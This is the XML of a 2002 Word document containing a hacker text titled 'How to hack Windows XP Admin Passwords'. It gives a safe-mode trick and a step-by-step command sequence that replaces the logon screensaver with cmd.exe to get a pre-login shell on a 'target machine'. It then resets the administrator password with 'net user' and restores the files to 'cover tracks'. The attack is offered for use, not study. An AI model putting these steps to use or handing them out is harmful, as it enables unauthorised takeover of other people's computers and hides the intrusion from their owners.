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0"/>
        <w:gridCol w:w="5126"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="77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How to hack Windows XP Admin Passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2650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How to hack Windows XP Admin Passwords the easy way by Estyle, Jaoibh </w:t>
              <w:br/>
              <w:t>and Azrael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------------------------------------------------------------------------------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his hack will only work if the person that owns the machine</w:t>
              <w:br/>
              <w:t>has no intelligence. This is how it work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When you or anyone installs Windows XP for the first time your </w:t>
              <w:br/>
              <w:t>asked to put in your username and up to five othe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Now, unknownst to a lot of other people this is the only place in </w:t>
              <w:br/>
              <w:t xml:space="preserve">Windows XP that you can password the default Administrator Diagnostic </w:t>
              <w:br/>
              <w:t xml:space="preserve">Account. This means that to by pass most administrators accounts </w:t>
              <w:br/>
              <w:t xml:space="preserve">on Windows XP all you have to do is boot to safe mode by pressing F8 </w:t>
              <w:br/>
              <w:t xml:space="preserve">during boot up and choosing it. Log into the Administrator Account </w:t>
              <w:br/>
              <w:t>and create your own or change the password on the current Accoun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This only works if the user on setup specified a password for the </w:t>
              <w:br/>
              <w:t>Administrator Accoun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br/>
              <w:t>This has worked for me on both Windows XP Home and Pro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-----------------------------------------------------------------------------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w this one seems to be machine dependant, it works randomly(don't know why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br/>
              <w:t>If you log into a limited account on your target machine and open up a dos prompt</w:t>
              <w:br/>
              <w:t>then enter this set of commands Exactly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(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work </w:t>
              <w:br/>
              <w:t>on the welcome screen of a normal booted machine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-----------------------------------------------------------------------------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d\ *drops to root</w:t>
              <w:br/>
              <w:t>cd\windows\system32 *directs to the system32 dir</w:t>
              <w:br/>
              <w:t>mkdir temphack *creates the folder temphack</w:t>
              <w:br/>
              <w:t>copy logon.scr temphack\logon.scr *backsup logon.scr</w:t>
              <w:br/>
              <w:t>copy cmd.exe temphack\cmd.exe *backsup cmd.exe</w:t>
              <w:br/>
              <w:t>del logon.scr *deletes original logon.scr</w:t>
              <w:br/>
              <w:t>rename cmd.exe logon.scr *renames cmd.exe to logon.scr</w:t>
              <w:br/>
              <w:t>exit *quits do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-----------------------------------------------------------------------------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w what you have just done is told the computer to backup the command program</w:t>
              <w:br/>
              <w:t xml:space="preserve">and the screen saver file, then edits the settings so when the machine boots the </w:t>
              <w:br/>
              <w:t>screen saver you will get an unprotected dos prompt with out logging into XP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Once this happens if you enter this command minus the quote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"net user &lt;admin account name here&gt; password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f the Administrator Account is called Frank and you want the password blah enter thi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"net user Frank blah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nd this changes the password on franks machine to blah and your in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br/>
              <w:t>Have fu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p.s: dont forget to copy the contents of temphack back into the system32 dir to cover track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ny updates, Errors, Suggestions or just general comments mail them to eith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style89@hotmail.com</w:t>
              <w:br/>
              <w:t>jaoibh@hotmail.com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54:00Z</dcterms:created>
  <dc:creator>RIDE IT</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>RIDE IT</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2002-11-11T19:54:00Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title>How to hack Windows XP Admin Passwords</dc:title>
</cp:coreProperties>
</file>